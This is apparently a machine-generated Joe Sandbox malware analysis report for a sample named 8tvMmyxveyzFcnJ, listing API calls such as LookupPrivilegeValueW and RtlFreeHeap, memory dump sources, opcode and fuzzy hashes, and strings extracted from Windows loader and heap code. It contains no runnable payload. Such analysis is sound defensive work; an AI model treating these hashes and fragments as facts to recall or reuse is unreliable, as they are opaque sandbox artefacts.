              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: c6bfbd0e50fad47e42f28fde3aa2b8a84a11a10a947687da3d496739955b5f60
              • Instruction ID: 24307b1b16fdc674b1b2a46e27d06997c9a9b4145e39e254628283c940cb61d2
              • Opcode Fuzzy Hash: c6bfbd0e50fad47e42f28fde3aa2b8a84a11a10a947687da3d496739955b5f60
              • Instruction Fuzzy Hash: 37E065B51142146FD724DF68CC48E9B776CDF48A54F118659B95857291C530E91087A0

              Control-flow Graph
              • Blocks: 264 41a7c9-41a7ea (call 41af60); 267 41a7ef-41a804 (LookupPrivilegeValueW)
              • Edges: 264->267
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6eef14145c37bd4ce939ac30feff25a05528fb10757d3c4a07bdb24ae85c2ea4
              • Instruction ID: af75529915aef102090087d8ecb2994e73b38dbc4dd88fb73fd8a3c03c61f894
              • Opcode Fuzzy Hash: 6eef14145c37bd4ce939ac30feff25a05528fb10757d3c4a07bdb24ae85c2ea4
              • Instruction Fuzzy Hash: 28E06DB12002086FCB24DF65CC85EDB3769EF49350F118158F90D97241CA35E8118BB0

              Control-flow Graph
              • Blocks: 268 41a670-41a686; 269 41a68c-41a6a1 (RtlFreeHeap); 270 41a687 (call 41af60)
              • Edges: 268->269, 268->270, 270->269
              APIs
              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
              • Instruction ID: 40f17b9abc4e5a11b7234fde54eca58a87b5f9aed2c49df71f13bedcf31bee13
              • Opcode Fuzzy Hash: be1a45ff1c783afca4ed5f8db2847d83c70a74692a8304be6e2f9e853d9c4056
              • Instruction Fuzzy Hash: 26B09B71D019C5C5DE12E76447087177900B7D0705F15C076D3030686F8738C1D1E675
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
              • API String ID: 0-2160512332
              • Opcode ID: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
              • Instruction ID: 0690fbc85b6e39226d86efc5590c0ad3a02e0fd217d974e5ad1ae8dc7e2427fc
              • Opcode Fuzzy Hash: 57a4aaba3fd7b6091dec39b91a55d8271e8afc12d2db20e78ca99cf338697e31
              • Instruction Fuzzy Hash: 33928E71604342ABE725DF29C841F6BBBE8BB88754F04491EFA94D7360D7B0E845CB92
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
              • API String ID: 0-3591852110
              • Opcode ID: 4915862e755b5d441fcfc379916cf48e33ee602334ef286fedebb6e85405fea6
              • Instruction ID: 68d097e5d54a4c8e506d4ad0f3b3e78698075fc68937b6e9b385581a2c2b37a5
              • Opcode Fuzzy Hash: 4915862e755b5d441fcfc379916cf48e33ee602334ef286fedebb6e85405fea6
              • Instruction Fuzzy Hash: 5D12AE34600642DFD7259F29C441BBABBF9FF99B18F08845EE4868B761D734E881CB52
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
              • API String ID: 0-3532704233
              • Opcode ID: 34c37e292e05164fbad1cd06f4efc8544435590ce4a97bb17eb6b689e3f279a3
              • Instruction ID: 6ae12e2d8854cba3bc5ae6f3c957366b5808588e5582c8c233b91e07c791a81d
              • Opcode Fuzzy Hash: 34c37e292e05164fbad1cd06f4efc8544435590ce4a97bb17eb6b689e3f279a3
              • Instruction Fuzzy Hash: 8AB1AE72508316DFD712DF69C440A6FBBE8FB84758F81492EF989D7650D730DA088B92
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
              • API String ID: 2994545307-3063724069
              Strings
              Similarity
              • API ID:
              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
              • API String ID: 0-1700792311
              Strings
              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 013AD262
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 013AD2C3
              • @, xrefs: 013AD0FD
              • @, xrefs: 013AD2AF
              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 013AD0CF
              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 013AD146
              • Control Panel\Desktop\LanguageConfiguration, xrefs: 013AD196
              • @, xrefs: 013AD313
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
              • API String ID: 0-1356375266
              Strings
              Similarity
              • API ID:
              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
              • API String ID: 0-523794902
              Strings
              Similarity
              • API ID:
              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
              • API String ID: 0-122214566
              Strings
              Similarity
              • API ID:
              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
              • API String ID: 0-792281065
              Strings
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
              • API String ID: 0-1745908468
              Strings
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014202E7
              • RTL: Re-Waiting, xrefs: 0142031E
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014202BD
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
              • API String ID: 0-2474120054
              Strings
              • Kernel-MUI-Number-Allowed, xrefs: 013D5247
              • Kernel-MUI-Language-Allowed, xrefs: 013D527B
              • Kernel-MUI-Language-SKU, xrefs: 013D542B
              • Kernel-MUI-Language-Disallowed, xrefs: 013D5352
              • WindowsExcludedProcs, xrefs: 013D522A
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              Strings
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              Strings
              Similarity
              • API ID: InitializeThunk
              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
              • API String ID: 2994545307-3570731704
              Strings
              Similarity
              • API ID:
              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
              • API String ID: 0-379654539
              Strings
              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E855E
              • LdrpInitializeProcess, xrefs: 013E8422
              • @, xrefs: 013E8591
              • minkernel\ntdll\ldrinit.c, xrefs: 013E8421
              Similarity
              • API ID:
              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
              • API String ID: 0-1918872054
              Strings
              • Could not validate the crypto signature for DLL %wZ, xrefs: 0141A589
              • LdrpCompleteMapModule, xrefs: 0141A590
              • minkernel\ntdll\ldrmap.c, xrefs: 0141A59A
              • MZER, xrefs: 013D16E8
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
              • API String ID: 0-1409021520
              Strings
              Similarity
              • API ID: InitializeThunk
              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
              • API String ID: 2994545307-336120773
              Strings
              Similarity
              • API ID: InitializeThunk
              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
              • API String ID: 2994545307-1391187441
              Strings
              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 013B1728
              • HEAP[%wZ]: , xrefs: 013B1712
              • HEAP: , xrefs: 013B1596
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              Strings
              Similarity
              • API ID:
              • String ID: FilterFullPath$UseFilter$\??\
              • API String ID: 0-2779062949
              Strings
              Similarity
              • API ID:
              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
              • API String ID: 0-3870751728
              Strings
              Similarity
              • API ID:
              • String ID: %$&$@
              • API String ID: 0-1537733988
              Strings
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
              • API String ID: 0-1151232445
              Strings
              • PreferredUILanguages, xrefs: 0146C212
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0146C1C5
              • @, xrefs: 0146C1F1
              Similarity
              • API ID:
              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
              • API String ID: 0-2968386058
              Strings
              Similarity
              • API ID:
              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
              • API String ID: 0-1373925480
              Strings
              • RtlCreateActivationContext, xrefs: 014229F9
              • Actx , xrefs: 013E33AC
              • SXS: %s() passed the empty activation context data, xrefs: 014229FE
              Similarity
              • API ID:
              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
              • API String ID: 0-859632880
              Strings
              • GlobalFlag, xrefs: 0143B68F
              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0143B632
              • @, xrefs: 0143B670
              Similarity
              • API ID:
              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
              • API String ID: 0-4192008846
              Strings
              • BuildLabEx, xrefs: 013F130F
              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 013F127B
              • @, xrefs: 013F12A5
              Similarity
              • API ID:
              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 0-3051831665
              Strings
              • LdrpInitializationFailure, xrefs: 014320FA
              • Process initialization failed with status 0x%08lx, xrefs: 014320F3
              • minkernel\ntdll\ldrinit.c, xrefs: 01432104
              Similarity
              • API ID:
              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
              • API String ID: 0-2986994758
              Strings
              Similarity
              • API ID: ___swprintf_l
              • String ID: #%u
              • API String ID: 48624451-232158463
              Strings
              Similarity
              • API ID:
              • String ID: @$@
              • API String ID: 0-149943524
              Strings
              Similarity
              • API ID:
              • String ID: `$`
              • API String ID: 0-197956300
              Strings
              • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA309
              • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA2FB
              Similarity
              • API ID:
              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
              • API String ID: 0-2876891731
              Strings
              Similarity
              • API ID:
              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
              • API String ID: 0-118005554
              • Opcode ID: 0c103e3a7c229be3006f931b665704e2294283c3be59d8b83f8abb2be2eaa064
              • Instruction ID: 1768788b4a94275ae8b37962a3f1263ba876ca1abab8c9fd643e5b43c90ec43c
              • Opcode Fuzzy Hash: 0c103e3a7c229be3006f931b665704e2294283c3be59d8b83f8abb2be2eaa064
              • Instruction Fuzzy Hash: D43180312087529BE321DF68D454B2ABBE4FF95B14F15086AFD588B3A0E631D905CB52
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: .Local\$@
              • API String ID: 0-380025441
              • Opcode ID: ab25d92dfcb30259de117d6d834897b6df020f57c101632ccd87fab90b006458
              • Instruction ID: 3c2d199ea048f0d0bd4d0ad47753664c4522e85c85a94d0ccefbad5f116f9dc9
              • Opcode Fuzzy Hash: ab25d92dfcb30259de117d6d834897b6df020f57c101632ccd87fab90b006458
              • Instruction Fuzzy Hash: 9D317072548315AFD721DF28C484EABBBE8FF85658F44092EF99583390DA31DD04CB92
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: Cleanup Group$Threadpool!
              • API String ID: 2994545307-4008356553
              • Opcode ID: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
              • Instruction ID: 0597a406809cbf1e97d95ed8206166a20244d445aa1b20ac56fc4b2bc1c218da
              • Opcode Fuzzy Hash: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
              • Instruction Fuzzy Hash: 1E01D1B2250704AFD311DF24CE49B167BE8F785729F068979A658C71D0E334D804CB46
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3b7decdb014c5d9cacd0c49c188d4fbd0d3edc9ecc092ca555aa40324efc598d
              • Instruction ID: 7ef8a6ea21f7689215e1be43b01f73ebe1309a051793abef9361e8ed9fa866fe
              • Opcode Fuzzy Hash: 3b7decdb014c5d9cacd0c49c188d4fbd0d3edc9ecc092ca555aa40324efc598d
              • Instruction Fuzzy Hash: 12A15971608346CFC321DF28C480A6ABBE9FBD8718F15492EE68597791E730E945CB92
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
              • Instruction ID: 1b07fe068d89d35f33d288629efcc27ccca211ac7c99e2a337f69595e1446181
              • Opcode Fuzzy Hash: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
              • Instruction Fuzzy Hash: 2191637290021ABFEB21DB99DC85FAE7BB8EF58B54F154065F604AB1A0D674AD00CB60
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: PreferredUILanguages
              • API String ID: 0-1884656846
              • Opcode ID: e0ff4c08ceeee7da92d403674dd28f4dc8191e213d2a578e931940a668727d9e
              • Instruction ID: 54c68f2de02a2ea2910ff4ebbb8ca3a9d8cda8077b91cb2fd7ecfe3184953c4f
              • Opcode Fuzzy Hash: e0ff4c08ceeee7da92d403674dd28f4dc8191e213d2a578e931940a668727d9e
              • Instruction Fuzzy Hash: E5419632F00219ABDB11EA98C840AEFB7BDEF54658F054167EE11E7360E630DE80C7A1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: kLsE
              • API String ID: 0-3058123920
              • Opcode ID: 5f7f7cce33f6701824b315c8b9e563a398799964678513f3fa4f3fb8c9c9bc2c
              • Instruction ID: 0d61fe92bd44ebf87166b327615a667bd8f31672309ad4e78bb18f34ff9a322f
              • Opcode Fuzzy Hash: 5f7f7cce33f6701824b315c8b9e563a398799964678513f3fa4f3fb8c9c9bc2c
              • Instruction Fuzzy Hash: 60419E7150135247E731AB79E8847AA3FD4A710B68F9F012EEE504B2FACBB40482C791
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: #
              • API String ID: 0-1885708031
              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
              • Instruction ID: 28b29160cc6234be826418eba8cf61c1dbf74430296fb40ab0089bf1a04313fb
              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
              • Instruction Fuzzy Hash: 8341CF75A0026AEBCF21DF88C494BBEB7B5FF44709F00445AE945A7290DB34D982CBE1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Actx
              • API String ID: 0-89312691
              • Opcode ID: 56a2d9bcf915c55503884ead6ae718bdd344e276f012ef4825e6012b7bf9e475
              • Instruction ID: 2f2340dd00b5364a632c63ebc4ae8d350bdba68fd9a31cc7e8887320035e00f2
              • Opcode Fuzzy Hash: 56a2d9bcf915c55503884ead6ae718bdd344e276f012ef4825e6012b7bf9e475
              • Instruction Fuzzy Hash: 2B11E63074420A8BEB245D0D88D06F6B799EB9122CF34813AEB62CBF91F671DC408380
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: LdrCreateEnclave
              • API String ID: 0-3262589265
              • Opcode ID: e75c0daf433e35a39b23494cd0ad26ef9d880b3f54dbaca45365933156c2abbf
              • Instruction ID: 87f20f2cf76d5305dd8a61ab69b2f7d9f7bd23f9ba724f7986e1299b780c7cdb
              • Opcode Fuzzy Hash: e75c0daf433e35a39b23494cd0ad26ef9d880b3f54dbaca45365933156c2abbf
              • Instruction Fuzzy Hash: 5121F5B15083449BC710DF1A8844A9BFBE8FBE9B50F404A1FB99497360E7B09504CB92
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 349887e03f75cdfeef95afdfcdc773d17030fcb9e035a7094b9ea67d4665657e
              • Instruction ID: bf6539c57c50760eca8720b8bdab49c58a49add30d0f731d5fd3a589914d7c45
              • Opcode Fuzzy Hash: 349887e03f75cdfeef95afdfcdc773d17030fcb9e035a7094b9ea67d4665657e
              • Instruction Fuzzy Hash: AA42B171A006168FDB16CF5EC4805BEBBB2FF88315B14856ED586AB3A0D734F842CB91
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 703dda2d071d682e881af16b4bbb8468bd006442056d8181e151cb6e3eb56902
              • Instruction ID: cfc9c55156cf0b2e5e626bca5f746cccda22f845300494d6337194dd22922edb
              • Opcode Fuzzy Hash: 703dda2d071d682e881af16b4bbb8468bd006442056d8181e151cb6e3eb56902
              • Instruction Fuzzy Hash: 2332A076E00219DBDF14CFA8D880BAEBBB5FF55718F1A002DE905AB395E7359901CB90
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
              • Instruction ID: 07379212290d5343c860e2aa76d84ee4256dd383e6d49ce479dd5b4698ea8c61
              • Opcode Fuzzy Hash: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
              • Instruction Fuzzy Hash: 18424E75A0021A8FEB25CFA9C841BAEBBF5BF48304F14809AE949AB251D7349D85CF50
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77828ba64fff03b37547fa4e5d3e442368ce97206aa831e8fd6ab5823cfeaf62
              • Instruction ID: 31693a9e7d725d8395b0686ede8bd8cd50d418a57adb348ba8c55ff7d2b19e1a
              • Opcode Fuzzy Hash: 77828ba64fff03b37547fa4e5d3e442368ce97206aa831e8fd6ab5823cfeaf62
              • Instruction Fuzzy Hash: 5822CE702046618BEBA5CF29C094772BBE1AF45344F28865BED868F3A7E735D442CB61
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6953a03bb36781df7cc7ffd60fc7a301d35e47afa8436831e1a3baa431a8be5e
              • Instruction ID: 0e5b7902f26de3929fcfbae9ce4e1622b67bb8185a15036367489a84fb67251a
